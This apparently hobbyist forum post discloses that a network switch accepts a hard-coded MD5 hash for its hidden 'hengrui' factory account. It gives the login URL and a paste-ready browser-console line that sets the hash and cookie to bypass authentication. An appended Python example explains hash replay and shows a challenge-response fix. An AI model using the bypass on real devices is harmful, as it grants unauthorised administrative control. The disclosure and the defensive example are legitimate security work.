I didn't get the hengrui password and login_ft.cgi to work. You can access the factory methods using the admin credentials by CGI (attached is an example of changing the colour to pink):
/ftdft.cgi
/ftlogo.cgi
/ftcolor.cgi
...
After a mini adventure - flashing the wrong firmware and recovering via a serial adapter (thanks for the tips on how to enter recovery mode)... I had a poke about...
While I haven't got the password for 'hengrui', you don't need it: it's possible to log in directly with the MD5 hashes - the hashes are computed in the browser and the result is sent to the switch for validation... not great!
If you are using these switches anywhere security is a concern then probably the best way to secure this switch is to move all but "trusted ports" off VLAN 1 (which is the only VLAN the web interface can be accessed from). Correction: this doesn't work - as Viper_Rus pointed out - I had screwed up the ports' VLAN membership.
The "hengrui" login also has access to the normal admin area too.
Visit -
http://{switch ip}/login_ft.cgi
F12 for Developer Tools, then run the following in the developer console
document.login.username.value = 'hengrui';document.login.language.value='EN';document.login.Response.value = '81d57ea79621e8887914f40ee4122185';document.cookie = 'admin=81d57ea79621e8887914f40ee4122185';document.login.submit();
This login has some of the "hidden" factory settings that up-n-atom found. If you remove Hengrui_mp_cfg from the URL, you are back in the normal admin area.
Rich
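
Why a browser-computed hash is as good as the password, shown as an added example that is not part of the original post or the switch firmware: a device that compares a fixed hash accepts any replay of it, while a per-login nonce makes a captured response useless. The account, the hash formula and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed sample account; not a credential from the post or any device.
USER, PASSWORD = "operator", "correct horse battery"

# Scheme the post describes: the browser sends a fixed hash and the device
# compares it with a stored value. The hash formula here is an assumption.
STORED_HASH = hashlib.md5((USER + PASSWORD).encode()).hexdigest()

def static_verify(response: str) -> bool:
    return hmac.compare_digest(response, STORED_HASH)

# Alternative: the device issues a one-time nonce and the client proves
# knowledge of a password-derived key by MACing that nonce.
def derive_key(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def client_response(key: bytes, nonce: str) -> str:
    return hmac.new(key, nonce.encode(), hashlib.sha256).hexdigest()

class ChallengeVerifier:
    def __init__(self, key: bytes):
        self._key = key
        self._pending = set()  # nonces issued but not yet used

    def new_challenge(self) -> str:
        nonce = secrets.token_hex(16)
        self._pending.add(nonce)
        return nonce

    def verify(self, nonce: str, response: str) -> bool:
        if nonce not in self._pending:
            return False  # unknown or already-used nonce: replay rejected
        self._pending.discard(nonce)
        return hmac.compare_digest(response, client_response(self._key, nonce))

def replay_outcomes() -> dict:
    captured = STORED_HASH  # what an observer of one static login sees
    key = derive_key(PASSWORD, b"constructed-salt")
    device = ChallengeVerifier(key)
    nonce = device.new_challenge()
    resp = client_response(key, nonce)
    return {
        "static_replay": static_verify(captured),
        "challenge_first_use": device.verify(nonce, resp),
        "challenge_same_nonce": device.verify(nonce, resp),
        "challenge_new_nonce": device.verify(device.new_challenge(), resp),
    }
```

The nonce scheme only addresses replay of a captured response; the device still holds a password-derived key, so that stored value needs the same protection as the password itself.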